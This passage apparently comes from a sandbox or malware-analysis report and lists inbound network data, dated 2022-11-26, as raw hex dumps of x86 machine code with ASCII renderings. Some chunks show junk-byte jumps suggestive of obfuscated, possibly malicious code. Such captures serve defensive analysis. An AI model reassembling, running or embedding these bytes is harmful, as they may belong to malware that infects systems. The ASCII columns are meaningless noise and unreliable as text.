2022-11-26 10:17:53 UTC	1488	IN	Data Raw: 83 01 00 00 8b 5c 24 20 8b 54 24 24 8d 76 00 0f b7 28 66 39 2b 0f 85 f4 01 00 00 83 c3 02 83 c0 02 83 ea 01 75 e9 29 cf 85 ff 0f 85 4c ff ff ff 89 f1 e8 80 ed ff ff 80 7c 24 7c 02 0f 84 25 ff ff ff 84 c0 0f 85 45 01 00 00 8b 46 18 89 c2 83 e2 03 80 fa 03 0f 84 cc 01 00 00 84 d2 0f 85 54 02 00 00 83 e0 fc 0f 84 4b 02 00 00 8b 10 8d 58 08 c1 e2 05 8d 54 10 08 89 54 24 20 39 da 75 12 e9 32 02 00 00 66 90 83 c3 20 39 d3 0f 84 25 02 00 00 0f b6 43 18 83 e0 03 3c 03 75 ea 8b 44 24 1c 8d 4c 24 3c bf 01 00 00 00 89 04 24 e8 05 c8 05 00 83 ec 04 8b 6c 24 3c 8b 44 24 40 0f b6 54 24 44 39 5c 24 20 0f 84 a3 00 00 00 8d 76 00 84 d2 0f 84 a5 fe ff ff 8b 73 04 89 ea 39 ee 0f 46 d6 85 d2 74 52 8b 0b 89 4c 24 24 39 c1 74 48 85 c9 0f 95 44 24 28 85 c0 0f 95 44 24 2f 0f b6 Data Ascii: \$ T$$v(f9+u)L\|$\|%EFTKXTT$ 9u2f 9%C<uD$L$<$l$<D$@T$D9\$ vs9FtRL$$9tHD$(D$/
2022-11-26 10:17:53 UTC	1504	IN	Data Raw: cc e8 81 37 fd ff 8b 55 1c 8b 4d 1c 8d 45 e4 c7 45 f4 00 00 00 00 8b 12 8b 59 04 89 45 dc 89 d1 89 55 88 01 d9 89 5d 98 74 08 85 d2 0f 84 27 01 00 00 8b 4d 98 89 4d d8 83 f9 0f 0f 87 c6 00 00 00 83 7d 98 01 0f 85 a4 00 00 00 8b 55 88 0f b6 12 88 55 e4 8d 55 dc 89 55 a0 8b 5d 98 8b 55 0c d9 ee 89 5d e0 c6 04 18 00 8b 45 a0 8b 5d 94 db 7c 24 1c 89 44 24 28 0f be 45 8c 89 54 24 0c 89 44 24 18 8b 45 14 c7 45 f4 10 da 5d 00 89 44 24 14 0f b6 45 90 89 44 24 10 8b 45 08 89 44 24 08 8b 43 08 c6 04 24 00 89 44 24 04 c7 45 a8 01 00 00 00 e8 70 38 06 00 89 45 98 8b 45 f4 89 55 9c 85 c0 74 0f 8b 55 a0 c7 45 a8 00 00 00 00 89 14 24 ff d0 8d 45 a4 89 04 24 e8 79 39 fd ff 8b 45 98 8b 55 9c 8b 5d fc c9 c2 18 00 8d 74 26 00 8b 4d 98 8d 55 dc 89 55 a0 85 c9 0f 84 5a ff ff Data Ascii: 7UMEEYEU]t'MM}UUUU]U]E]\|$D$(ET$D$EE]D$ED$ED$C$D$Ep8EEUtUE$E$y9EU]t&MUUZ
2022-11-26 10:17:53 UTC	1520	IN	Data Raw: bc 89 04 24 e8 ee 6f 0b 00 8b 45 c0 c7 45 c8 ff ff ff ff 89 04 24 e8 2c fc fc ff 8b 45 bc 8b 48 0c e8 61 0b 00 00 8b 4d b4 e8 69 b0 0a 00 eb ce 8b 4d b4 e8 0f 7a 08 00 eb c4 8b 45 bc 8b 48 0c e8 42 0b 00 00 8b 4d b0 e8 1a 8f 05 00 eb af 8b 4d b0 e8 f0 79 08 00 eb a5 8b 45 bc 8b 48 0c e8 23 0b 00 00 8b 4d ac e8 8b 88 05 00 eb 90 8b 4d ac e8 d1 79 08 00 eb 86 8b 45 bc 8b 48 0c e8 04 0b 00 00 8b 4d a8 e8 2c b6 0a 00 e9 6e ff ff ff 8b 4d a8 e8 af 79 08 00 e9 61 ff ff ff 8b 4d bc e8 a2 79 08 00 e9 54 ff ff ff 8b 45 bc 8b 48 0c e8 d2 0a 00 00 8b 4d a4 e8 8a 9b 05 00 e9 3c ff ff ff 8b 4d a4 e8 7d 79 08 00 e9 2f ff ff ff 8b 45 bc 8b 48 0c e8 ad 0a 00 00 8b 4d a0 e8 f5 94 05 00 e9 17 ff ff ff 55 89 e5 83 ec 78 8d 55 c4 89 4d c0 89 14 24 c7 45 dc 90 4a 63 00 c7 45 Data Ascii: $oEE$,EHaMiMzEHBMMyEH#MMyEHM,nMyaMyTEHM<M}y/EHMUxUM$EJcE
2022-11-26 10:17:53 UTC	1536	IN	Data Raw: 66 b1 4b 42 c3 26 8f 8d 50 0b e1 df e7 80 84 29 c2 66 8b 36 66 89 75 e6 51 b9 1c 3b 00 00 59 8b 31 8d 0c 00 01 f7 01 f1 89 7d d4 bf 01 00 00 00 eb 05 9b ec 76 04 d0 29 df 50 b8 53 45 00 00 58 39 da 0f 82 42 01 00 00 50 58 8d 45 e6 52 ba 83 28 00 00 5a eb 19 2d a0 c8 5f 61 bb e9 00 42 7e 4b 86 a0 e4 f2 81 87 a8 0d bc 34 8f 61 27 18 eb 05 16 6b 94 9c ad 52 ba ee 58 00 00 5a 51 b9 5d 27 00 00 b9 f1 14 00 00 b9 b3 2a 00 00 b9 4e 43 00 00 59 eb 05 95 64 6b 07 03 01 fa 50 b8 c3 2b 00 00 b8 ac 70 00 00 b8 6b 38 00 00 b8 6d 72 00 00 58 89 0c 24 89 44 24 08 89 54 24 04 e8 35 71 05 00 89 c1 85 c0 0f 84 be 00 00 00 8b 45 08 52 5a 89 0c 24 eb 19 91 59 e6 6e 9a fc 37 50 88 9e 12 3b ae a2 4d f2 ec 96 13 6c 24 ee db f5 9c 89 5c 24 08 89 44 24 04 eb 19 a5 fd 33 99 fd 13 Data Ascii: fKB&P)f6fuQ;Y1}v)PSEX9BPXER(Z-_aB~K4a'kRXZQ]'*NCYdkP+pk8mrX$D$T$5qERZ$Yn7P;Ml$\$D$3
2022-11-26 10:17:53 UTC	1552	IN	Data Raw: 00 89 54 24 70 8b 90 98 00 00 00 89 54 24 74 8b 90 9c 00 00 00 89 54 24 78 8b 90 a0 00 00 00 89 54 24 7c 8b 90 a4 00 00 00 89 94 24 80 00 00 00 8b 90 a8 00 00 00 89 94 24 84 00 00 00 8b 90 ac 00 00 00 89 94 24 88 00 00 00 8b 90 b0 00 00 00 89 94 24 8c 00 00 00 8b 90 b4 00 00 00 89 94 24 90 00 00 00 8b 90 b8 00 00 00 89 94 24 94 00 00 00 8b 90 bc 00 00 00 89 94 24 98 00 00 00 8b 80 c0 00 00 00 89 84 24 9c 00 00 00 8d 44 24 68 8b 4c 24 4c 89 44 24 20 8b 84 24 d0 00 00 00 89 2c 24 89 44 24 1c 8d 44 24 70 89 44 24 14 8d 44 24 6c 89 44 24 10 8b 44 24 3c c7 44 24 18 0c 00 00 00 89 44 24 08 8b 44 24 40 89 44 24 0c 8b 44 24 38 89 44 24 04 e8 ad f3 ff ff 83 ec 24 89 c5 8b 44 24 68 89 54 24 38 85 c0 0f 85 58 fc ff ff 8b 44 24 6c 8b 9c 24 d8 00 00 00 89 43 10 e9 45 Data Ascii: T$pT$tT$xT$\|$$$$$$$$D$hL$LD$ $,$D$D$pD$D$lD$D$<D$D$D$@D$D$8D$$D$hT$8XD$l$CE
2022-11-26 10:17:53 UTC	1568	IN	Data Raw: 00 89 44 24 08 8b 44 24 50 89 34 24 89 44 24 0c 89 6c 24 04 e8 5e e2 ff ff 83 ec 28 89 84 24 e0 00 00 00 89 94 24 e4 00 00 00 66 89 54 24 64 66 89 d5 89 c6 8b 84 24 18 01 00 00 85 c0 0f 85 28 f0 ff ff 8b 84 24 1c 01 00 00 8b 9c 24 88 01 00 00 89 43 0c e9 12 f0 ff ff 8d b6 00 00 00 00 8b 06 88 54 24 48 89 f1 ff 50 24 0f b6 54 24 48 e9 62 f0 ff ff 8d 76 00 8b 4c 24 44 88 54 24 48 8b 01 ff 50 24 0f b6 54 24 48 e9 84 f0 ff ff 8d 84 24 18 01 00 00 66 8b 6c 24 64 c7 44 24 1c 02 00 00 00 89 44 24 24 8b 84 24 80 01 00 00 c7 44 24 18 1f 00 00 00 8b 4c 24 54 89 44 24 20 8d 84 24 1c 01 00 00 89 44 24 10 8b 44 24 44 c7 44 24 14 0a 00 00 00 89 44 24 08 8b 44 24 50 89 34 24 89 44 24 0c 89 6c 24 04 e8 8b e1 ff ff 83 ec 28 89 84 24 d0 00 00 00 89 94 24 d4 00 00 00 e9 28 Data Ascii: D$D$P4$D$l$^($$fT$df$($$CT$HP$T$HbvL$DT$HP$T$H$fl$dD$D$$$D$L$TD$ $D$D$DD$D$D$P4$D$l$($$(
2022-11-26 10:17:53 UTC	1584	IN	Data Raw: 0c 0f 83 d3 04 00 00 8b 9d 68 ff ff ff 0f b6 08 8b 53 1c 38 0a 0f 84 ab 04 00 00 8b 85 68 ff ff ff 8b 40 28 85 c0 0f 84 d3 f8 ff ff 8b 45 80 c6 85 74 ff ff ff 01 c6 85 78 ff ff ff 00 8b 58 0c 39 58 08 0f 82 3f fc ff ff 89 c3 8b 00 89 d9 8b 40 24 c7 45 88 02 00 00 00 ff d0 83 f8 ff b8 00 00 00 00 0f 45 45 80 c6 85 74 ff ff ff 01 0f 94 85 78 ff ff ff 89 45 80 e9 0b fc ff ff 8d b4 26 00 00 00 00 8d 76 00 8b 85 7c ff ff ff 8b 9d 68 ff ff ff 8b 53 1c 38 02 0f 85 50 f8 ff ff 8b 85 68 ff ff ff 8b 5d 80 8b 40 20 89 85 4c ff ff ff 8b 43 08 3b 43 0c 0f 83 f4 03 00 00 8b 5d 80 83 c0 01 89 43 08 c7 85 7c ff ff ff ff ff ff ff 31 c0 e9 73 fb ff ff 8b 45 80 85 c0 74 63 80 bd 74 ff ff ff 00 74 5a 8b 5d 80 8b 43 08 3b 43 0c 0f 83 94 03 00 00 8b 9d 68 ff ff ff 8b 53 24 0f Data Ascii: hS8h@(EtxX9X?@$EEEtxE&v\|hS8Ph]@ LC;C]C\|1sEtcttZ]C;ChS$
2022-11-26 10:17:53 UTC	1600	IN	Data Raw: 24 c7 45 a8 02 00 00 00 e8 ca 00 00 00 eb 92 8d b4 26 00 00 00 00 90 8b 4d 94 c7 45 a8 02 00 00 00 e8 d1 a3 fe ff 8b 45 94 8b 00 8b 40 1c 3d 90 b0 57 00 0f 84 12 ff ff ff 8b 55 80 8b 4d 84 c7 45 a8 02 00 00 00 89 54 24 08 8b 55 a0 89 4c 24 04 8b 4d 94 89 14 24 ff d0 83 ec 0c e9 08 ff ff ff 8d b6 00 00 00 00 8b 45 a0 39 c2 0f 84 f7 fe ff ff 89 44 24 04 8b 4d 98 8b 45 80 89 4c 24 08 89 04 24 e8 b7 2c fd ff e9 dc fe ff ff 8b 45 ac 89 45 98 8b 45 a8 85 c0 75 1a 8d 4d dc e8 d5 3d 07 00 8b 45 98 c7 45 a8 ff ff ff ff 89 04 24 e8 93 bb fb ff 83 e8 01 75 14 8b 45 e0 8d 55 e8 39 d0 74 d7 89 04 24 e8 2c 2f 0a 00 eb cd 0f 0b 90 90 90 90 90 90 90 90 55 89 e5 53 81 ec e4 00 00 00 8b 45 08 c7 45 94 90 4a 63 00 c7 45 98 9c 84 63 00 89 85 6c ff ff ff 8b 45 0c 89 6d 9c 89 Data Ascii: $E&MEE@=WUMET$UL$M$E9D$MEL$$,EEEuM=EE$uEU9t$,/USEEJcEclEm
2022-11-26 10:17:53 UTC	1616	IN	Data Raw: 45 a4 8b 4d a8 c7 45 b8 03 00 00 00 89 04 24 e8 93 7b 03 00 8b 45 b0 83 ec 08 89 04 24 e8 a5 ec fc ff 03 45 b0 39 45 98 0f 85 09 ff ff ff 8b 45 a4 89 04 24 e8 ae ef 09 00 8b 5d 94 b8 ff ff ff ff f0 0f c1 43 fc 85 c0 7e 1d 8d 45 b4 89 04 24 e8 02 7a fb ff 8b 45 a8 8b 5d fc c9 c2 0c 00 8d b4 26 00 00 00 00 90 8d 45 f7 8b 4d 94 89 04 24 83 e9 0c e8 4f 76 03 00 83 ec 04 eb cd 8b 45 bc 89 45 b0 8b 45 b8 85 c0 75 26 8b 45 a8 8b 08 8d 45 f7 89 04 24 83 e9 0c e8 4a 76 03 00 c7 45 b8 ff ff ff ff 50 8b 45 b0 89 04 24 e8 97 7b fb ff 83 e8 01 75 14 8d 45 f7 8b 4d 94 89 04 24 83 e9 0c e8 21 76 03 00 52 eb c1 83 e8 01 75 22 8b 45 b0 89 04 24 e8 5e f1 09 00 8b 45 a4 89 04 24 e8 03 ef 09 00 c7 45 b8 04 00 00 00 e8 47 fe 09 00 83 e8 01 75 0e c7 45 b8 00 00 00 00 e8 06 f4 Data Ascii: EME${E$E9EE$]C~E$zE]&EM$OvEEEu&EE$JvEPE${uEM$!vRu"E$^E$EGuE
2022-11-26 10:17:53 UTC	1632	IN	Data Raw: 45 e4 c6 85 6f ff ff ff 00 89 45 a0 8b 45 e0 e9 90 fc ff ff 8d 76 00 89 4d 90 c6 85 78 ff ff ff 00 e9 56 fb ff ff 90 80 bd 78 ff ff ff 00 0f 85 74 07 00 00 8b 45 9c c6 85 74 ff ff ff 00 83 c0 4e 89 85 68 ff ff ff 31 c0 66 89 45 80 8b 45 9c 0f b6 50 10 84 d2 74 0f 89 c1 0f b6 45 a0 38 41 25 0f 84 40 01 00 00 8b 4d 9c 0f b6 45 a0 3a 41 24 74 8c 8b 85 64 ff ff ff 89 44 24 08 0f be 45 a0 89 44 24 04 8b 85 68 ff ff ff 89 04 24 e8 bc ac fc ff 85 c0 0f 84 64 ff ff ff 2b 85 68 ff ff ff 0f b7 4d 80 8d 50 fa 83 f8 0f 0f 4f c2 66 39 8d 70 ff ff ff 0f 82 84 00 00 00 66 0f af 4d 8c 0f b7 d9 b9 ff ff 00 00 29 c1 39 cb 0f 9f c1 01 d8 08 8d 74 ff ff ff 83 85 7c ff ff ff 01 66 89 45 80 8b 4d 94 8b 41 08 8b 51 0c 39 d0 73 6a 83 c0 01 89 41 08 c6 45 90 00 39 c2 0f 86 99 05 Data Ascii: EoEEvMxVxtEtNh1fEEPtE8A%@ME:A$tdD$ED$h$d+hMPOf9pfM)9t\|fEMAQ9sjAE9
2022-11-26 10:17:53 UTC	1648	IN	Data Raw: 55 a4 0f b6 45 a8 3a 42 24 74 ac 8b 45 84 89 44 24 08 0f be 45 a8 89 44 24 04 8b 45 8c 89 04 24 e8 2a 6d fc ff 85 c0 74 8e 2b 45 8c 8b 5d b0 8d 50 fa 83 f8 0f 0f 4f c2 39 5d 90 0f 82 06 01 00 00 8b 55 a0 8b 4d 88 0f af d3 29 c1 39 d1 0f 92 c1 01 d0 08 4d 94 83 45 98 01 89 45 b0 8b 4d 08 8b 41 08 3b 41 0c 0f 83 ad 00 00 00 83 c0 01 c7 45 0c ff ff ff ff 89 41 08 c6 45 a8 00 8b 41 0c 39 41 08 0f 83 e6 02 00 00 8b 4d 10 83 7d 14 ff 0f 94 c0 85 c9 0f 95 c2 20 c2 88 55 9c 0f 85 04 01 00 00 3a 45 a8 0f 84 bd fa ff ff 8b 4d 08 8b 45 0c 85 c9 74 09 83 f8 ff 0f 84 35 02 00 00 8b 5d a4 88 45 a8 0f b6 43 10 84 c0 0f 84 2e ff ff ff 89 da 0f b6 5d a8 38 5a 25 0f 85 1f ff ff ff 8b 55 98 85 d2 0f 84 49 03 00 00 0f be c2 8d 4d f4 c7 45 b8 01 00 00 00 89 04 24 e8 77 0f 03 Data Ascii: UE:B$tED$ED$E$*mt+E]PO9]UM)9MEEMA;AEAEA9AM} U:EMEt5]EC.]8Z%UIME$w
2022-11-26 10:17:53 UTC	1664	IN	Data Raw: ff 8d b6 00 00 00 00 88 55 a4 e9 48 f4 ff ff 8d b4 26 00 00 00 00 90 8b 41 08 3b 41 0c 0f 83 ea 00 00 00 0f b6 00 e9 e7 fe ff ff 8d 74 26 00 88 45 98 88 45 a4 e9 8d f6 ff ff 8d 74 26 00 90 b8 2b 00 00 00 e9 ff f5 ff ff 8b 45 f4 89 45 b0 8b 40 f4 8d 55 f4 89 55 a4 85 c0 0f 85 b2 f7 ff ff e9 d6 f7 ff ff 8b 01 8b 40 24 c7 45 b8 ff ff ff ff ff d0 83 f8 ff 0f 85 f8 fc ff ff c7 45 08 00 00 00 00 c6 45 a0 01 e9 e8 fc ff ff 8b 01 8b 40 24 c7 45 b8 01 00 00 00 ff d0 c6 45 b0 00 83 f8 ff 0f 85 05 f7 ff ff 0f b6 45 a0 c7 45 08 00 00 00 00 88 45 b0 e9 f2 f6 ff ff 8b 01 8b 40 24 c7 45 b8 01 00 00 00 ff d0 88 45 b0 83 f8 ff 0f 85 d9 f3 ff ff c7 45 08 00 00 00 00 c6 45 b0 ff e9 c9 f3 ff ff 8b 01 8b 40 28 c7 45 b8 01 00 00 00 ff d0 e9 05 f5 ff ff 8b 45 f4 8b 50 f4 89 45 Data Ascii: UH&A;At&EEt&+EE@UU@$EEE@$EEEEE@$EEEE@(EEPE
2022-11-26 10:17:53 UTC	1680	IN	Data Raw: f0 88 45 90 e9 84 f3 ff ff 8b 75 9c 8b 06 89 f1 8b 40 28 c7 45 a8 ff ff ff ff ff d0 8b 75 9c 8b 46 08 8b 56 0c e9 26 f3 ff ff 8b 45 98 ba ff ff ff ff b9 ff ff ff ff 66 89 55 86 66 89 4d a0 0f b6 40 10 e9 80 f3 ff ff c6 85 76 ff ff ff 00 88 55 85 e9 b8 f5 ff ff 0f b6 45 85 c7 45 88 00 00 00 00 c6 45 85 00 88 85 76 ff ff ff 8b 45 e4 89 45 a0 8b 45 e0 e9 95 f5 ff ff 8b 4d 9c 8b 01 8b 40 24 c7 45 a8 01 00 00 00 ff d0 66 89 45 a0 e9 c9 f9 ff ff 0f b6 45 85 c7 45 88 00 00 00 00 c6 85 78 ff ff ff 00 88 85 76 ff ff ff 8b 45 e4 c6 45 85 00 89 45 a0 8b 45 e0 e9 51 f5 ff ff 8b 4d 88 8b 01 8b 40 24 c7 45 a8 ff ff ff ff ff d0 e9 5e fd ff ff 8b 4d 90 8b 01 8b 40 24 c7 45 a8 ff ff ff ff ff d0 e9 10 fd ff ff 8b 4d 9c 8b 01 8b 40 24 c7 45 a8 ff ff ff ff ff d0 66 89 45 a0 Data Ascii: Eu@(EuFV&EfUfM@vUEEEvEEEM@$EfEEExvEEEEQM@$E^M@$EM@$EfE
2022-11-26 10:17:53 UTC	1696	IN	Data Raw: 66 83 fa ff 0f 85 b8 fe ff ff c7 45 10 00 00 00 00 0f b6 45 84 e9 a8 fe ff ff 8d 74 26 00 90 8b 41 08 3b 41 0c 0f 83 cd 01 00 00 0f b7 00 66 89 45 a8 66 83 7d a8 ff 0f 85 63 fb ff ff c7 45 08 00 00 00 00 e9 57 fb ff ff c7 45 a4 08 00 00 00 e9 05 f7 ff ff c7 04 24 20 00 00 00 8d 4d f4 c7 45 b8 01 00 00 00 e8 7c 4d 02 00 83 ec 04 e9 fa f7 ff ff c7 45 08 00 00 00 00 c6 45 9c 01 e9 49 fa ff ff 8b 45 a4 c7 45 98 00 00 00 00 c6 45 a0 00 89 45 80 89 45 88 31 c0 66 89 45 a8 c6 45 91 00 e9 95 f7 ff ff 8d 48 f4 8d 45 f3 89 04 24 e8 13 36 02 00 83 ec 04 e9 ec f8 ff ff 8b 4d 9c 8b 5d 20 89 ca f7 da 80 7d 91 00 0f 44 d1 89 13 e9 aa f8 ff ff 8b 45 1c c7 00 04 00 00 00 e9 85 fb ff ff 31 c0 c7 45 80 16 00 00 00 66 89 45 a8 c7 45 98 00 00 00 00 c6 45 a0 00 c6 45 91 00 c7 Data Ascii: fEEt&A;AfEf}cEWE$ ME\|MEEIEEEEE1fEEHE$6M] }DE1EfEEEE
2022-11-26 10:17:53 UTC	1712	IN	Data Raw: 24 c7 45 a8 ff ff ff ff ff d0 e9 aa f8 ff ff c7 45 08 00 00 00 00 c6 45 98 01 e9 e0 f6 ff ff c6 85 7b ff ff ff 00 c6 45 8c 01 e9 80 f5 ff ff 8b 41 08 3b 41 0c 0f 83 3e 01 00 00 0f b7 00 66 89 45 98 66 83 7d 98 ff 0f 85 d4 f4 ff ff c7 45 08 00 00 00 00 e9 c8 f4 ff ff 8b 01 8b 40 24 c7 45 a8 01 00 00 00 ff d0 89 c2 e9 38 fe ff ff 8b 01 8b 40 24 c7 45 a8 01 00 00 00 ff d0 e9 7d fc ff ff 88 85 7b ff ff ff 8b 45 90 c6 45 8c 01 89 85 64 ff ff ff 89 85 6c ff ff ff e9 2a f5 ff ff 8b 01 8b 40 24 c7 45 a8 01 00 00 00 ff d0 e9 3f f6 ff ff 8b 01 8b 40 24 c7 45 a8 01 00 00 00 ff d0 89 c2 e9 9f fb ff ff 8b 01 8b 40 24 c7 45 a8 ff ff ff ff ff d0 66 89 45 98 e9 fc fd ff ff 0f b6 85 7b ff ff ff c7 45 90 00 00 00 00 c6 85 7b ff ff ff 00 88 85 7c ff ff ff 8b 45 e4 c7 45 94 Data Ascii: $EEE{EA;A>fEf}E@$E8@$E}{EEdl*@$E?@$E@$EfE{E{\|EE
2022-11-26 10:17:53 UTC	1728	IN	Data Raw: 8b 01 89 14 24 89 5c 24 04 8b 40 30 c7 45 c8 ff ff ff ff ff d0 0f b6 55 bc 83 ec 08 3b 45 c0 b8 01 00 00 00 0f 45 d0 88 55 bc 8d 5d c4 31 c0 8a 45 bc 89 1c 24 89 45 c0 e8 1a ba f9 ff 8b 45 b8 8b 55 c0 8d 65 f8 5b 5e 5d c2 14 00 8d 76 00 8b 5d c0 8d 04 9d 1f 00 00 00 c1 e8 04 c1 e0 04 e8 c3 a1 f9 ff 29 c4 8d 44 24 27 89 54 24 10 83 e0 f0 89 65 ec 8d 70 04 8d 04 5a 8b 55 bc 89 44 24 14 8b 42 0c 89 75 c0 89 44 24 0c 8b 42 08 89 44 24 08 0f b7 42 26 89 34 24 89 44 24 04 e8 75 97 07 00 8b 55 c0 29 d0 d1 f8 80 7d b4 00 89 45 c0 0f 85 1c ff ff ff f7 45 a4 00 02 00 00 0f 84 0f ff ff ff 8b 45 18 85 c0 0f 84 04 ff ff ff 83 7d a0 40 0f 84 39 01 00 00 8b 45 a4 8b 5d 9c 83 ea 04 83 45 c0 02 c1 e8 0e 83 e0 01 0f b7 44 43 04 66 89 42 02 8b 45 bc 0f b7 40 30 66 89 02 e9 Data Ascii: $\$@0EU;EEU]1E$EEUe[^]v])D$'T$epZUD$BuD$BD$B&4$D$uU)}EEE}@9E]EDCfBE@0f
2022-11-26 10:17:53 UTC	1744	IN	Data Raw: ff ff ff 8b 41 0c 31 d2 39 41 08 0f 82 0e ff ff ff 8b 01 88 55 e4 ff 50 24 0f b6 55 e4 83 f8 ff 0f 85 f9 fe ff ff c7 45 08 00 00 00 00 89 da e9 eb fe ff ff 8d 76 00 83 c2 01 e9 37 ff ff ff 8d b4 26 00 00 00 00 90 8b 45 d0 8b 48 0c 39 48 08 0f 83 b9 01 00 00 31 db 38 da 0f 85 dc fe ff ff 83 ff 01 75 47 8b 45 cc 39 30 74 51 8b 45 28 8b 55 0c 83 08 04 8b 45 08 8d 65 f4 5b 5e 5f 5d c2 24 00 8d 74 26 00 90 8b 41 08 3b 41 0c 0f 83 a8 01 00 00 0f b6 00 e9 b4 fe ff ff 8d 74 26 00 8b 01 ff 50 28 8b 4d 08 e9 35 ff ff ff 83 ff 02 75 bb 8b 45 cc 39 30 74 05 39 70 04 75 af 8b 45 e0 8b 00 89 c2 2b 55 20 3b 45 20 0f 4d c2 8b 55 18 89 02 8b 45 08 8b 55 0c 8d 65 f4 5b 5e 5f 5d c2 24 00 8d 4d 08 31 db 31 f6 e8 c9 4e fc ff 8b 7d 20 88 45 e4 01 ff 0f 84 5d 01 00 00 89 7d dc Data Ascii: A19AUP$UEv7&EH9H18uGE90tQE(UEe[^_]$t&A;At&P(M5uE90t9puE+U ;E MUEUe[^_]$M11N} E]}
2022-11-26 10:17:53 UTC	1760	IN	Data Raw: 26 00 00 00 00 66 90 66 0f be e8 31 c0 66 89 74 24 4c 66 89 6c 24 4a 66 89 44 24 4e e9 3c ff ff ff 8d b6 00 00 00 00 8b 47 08 3b 47 0c 73 38 0f b7 00 66 83 f8 ff 0f 94 c1 eb a9 8d 74 26 00 8b 41 08 3b 41 0c 73 38 0f b7 00 66 83 f8 ff bb 00 00 00 00 bd 00 00 00 00 0f 44 de 0f 45 e9 e9 6e ff ff ff 8d 74 26 00 8b 07 89 54 24 2c 89 f9 ff 50 24 8b 54 24 2c eb ba 8d b4 26 00 00 00 00 8b 01 89 54 24 34 89 4c 24 30 ff 50 24 8b 54 24 34 8b 4c 24 30 eb b4 90 55 57 56 53 83 ec 5c 8b 44 24 70 8b 5c 24 74 89 4c 24 34 8b b4 24 8c 00 00 00 8b ac 24 90 00 00 00 89 44 24 30 8b 44 24 7c 8b 7c 24 78 89 44 24 2c 8b 84 24 80 00 00 00 83 c0 6c 89 04 24 e8 9d 62 07 00 89 c1 8b 84 24 84 00 00 00 c7 00 00 00 00 00 8b 01 c7 04 24 25 00 00 00 ff 50 28 83 ec 04 66 89 44 24 48 89 f0 Data Ascii: &ff1ft$Lfl$JfD$N<G;Gs8ft&A;As8fDEnt&T$,P$T$,&T$4L$0P$T$4L$0UWVS\D$p\$tL$4$$D$0D$\|\|$xD$,$l$b$$%P(fD$H
2022-11-26 10:17:53 UTC	1776	IN	Data Raw: 40 24 c7 45 b8 02 00 00 00 ff d0 e9 43 f6 ff ff 8b 01 8b 40 24 c7 45 b8 02 00 00 00 ff d0 89 c2 e9 c5 fb ff ff 8d 4d f0 c7 45 b8 02 00 00 00 e8 73 ef 00 00 e9 05 ff ff ff 8d 4d f0 c7 45 b8 02 00 00 00 e8 5f ef 00 00 8b 45 f0 e9 da fe ff ff 8b 01 8b 40 24 c7 45 b8 02 00 00 00 ff d0 e9 b2 fb ff ff c6 45 93 00 e9 ea f7 ff ff 83 7d 84 01 0f 97 c0 23 45 9c e9 37 f2 ff ff c6 45 a8 00 c6 45 9c 01 e9 e5 f8 ff ff 8b 45 bc 89 45 a8 8b 45 b8 85 c0 75 24 8b 45 ec 8d 48 f4 8d 45 f0 89 04 24 e8 41 f6 00 00 8b 45 a8 c7 45 b8 ff ff ff ff 51 89 04 24 e8 8e fb f8 ff 83 e8 01 75 14 8b 45 f0 8d 48 f4 8d 45 eb 89 04 24 e8 18 f6 00 00 53 eb c3 83 e8 01 75 22 8b 45 a8 89 04 24 e8 55 71 07 00 8b 8d 78 ff ff ff 8b 01 ff 50 04 c7 45 b8 04 00 00 00 e8 3e 7e 07 00 83 e8 01 75 1e c7 Data Ascii: @$EC@$EMEsME_E@$EE}#E7EEEEEu$EHE$AEEQ$uEHE$Su"E$UqxPE>~u
2022-11-26 10:17:53 UTC	1792	IN	Data Raw: 89 44 24 08 89 2c 24 e8 6b 06 00 00 89 c3 8d 50 0c 83 fd 01 74 41 85 ed 75 1d 31 c0 c7 43 08 00 00 00 00 89 2b 66 89 44 33 0c 83 c4 2c 89 d0 5b 5e 5f 5d c3 8d 76 00 89 14 24 89 74 24 08 89 7c 24 04 89 54 24 1c e8 f4 2c fa ff 8b 54 24 1c eb c9 8d b6 00 00 00 00 0f b7 07 66 89 43 0c eb ba c7 04 24 18 07 65 00 e8 1b 62 07 00 90 90 90 90 90 90 90 90 90 90 90 55 57 56 53 83 ec 2c 8b 74 24 44 8b 7c 24 40 85 f6 74 04 85 ff 74 72 29 fe 8b 44 24 48 c7 44 24 04 00 00 00 00 89 f5 d1 fd 89 44 24 08 89 2c 24 e8 cb 05 00 00 89 c3 8d 50 0c 83 fd 01 74 41 85 ed 75 1d 31 c0 c7 43 08 00 00 00 00 89 2b 66 89 44 33 0c 83 c4 2c 89 d0 5b 5e 5f 5d c3 8d 76 00 89 14 24 89 74 24 08 89 7c 24 04 89 54 24 1c e8 54 2c fa ff 8b 54 24 1c eb c9 8d b6 00 00 00 00 0f b7 07 66 89 43 0c eb Data Ascii: D$,$kPtAu1C+fD3,[^_]v$t$\|$T$,T$fC$ebUWVS,t$D\|$@ttr)D$HD$D$,$PtAu1C+fD3,[^_]v$t$\|$T$T,T$fC
2022-11-26 10:17:53 UTC	1808	IN	Data Raw: 44 24 04 00 00 00 00 c7 45 a8 ff ff ff ff 89 3c 24 e8 41 2a 00 00 83 ec 08 80 7d e3 00 74 65 8b 7d a0 c7 45 e4 00 00 00 00 8b 07 03 78 f4 8b 8f 84 00 00 00 85 c9 0f 84 84 00 00 00 8b 75 08 8b 11 8b 5f 78 89 7c 24 10 89 74 24 18 8d 75 e4 89 74 24 14 c7 44 24 08 00 00 00 00 c7 44 24 0c ff ff ff ff 89 1c 24 c7 44 24 04 ff ff ff ff 8b 42 14 c7 45 a8 01 00 00 00 ff d0 83 ec 1c 8b 45 e4 85 c0 75 1b 8d 45 a4 89 04 24 e8 c8 79 f8 ff 8b 45 a0 8d 65 f4 5b 5e 5f 5d c2 04 00 8d 76 00 8b 5d a0 8b 13 03 5a f4 0b 43 14 89 d9 c7 45 a8 ff ff ff ff 89 04 24 e8 5c 3c 06 00 83 ec 04 eb c4 c7 45 a8 01 00 00 00 e8 5b 21 07 00 8b 45 ac 8b 55 b0 89 45 9c 8b 45 a8 85 c0 75 33 8b 45 9c 83 ea 01 89 04 24 75 44 e8 4b f1 06 00 8b 55 a0 8b 02 03 50 f4 c7 04 24 01 00 00 00 89 d1 c7 45 Data Ascii: D$E<$A*}te}Exu_x\|$t$ut$D$D$$D$BEEuE$yEe[^_]v]ZCE$\<E[!EUEEu3E$uDKUP$E
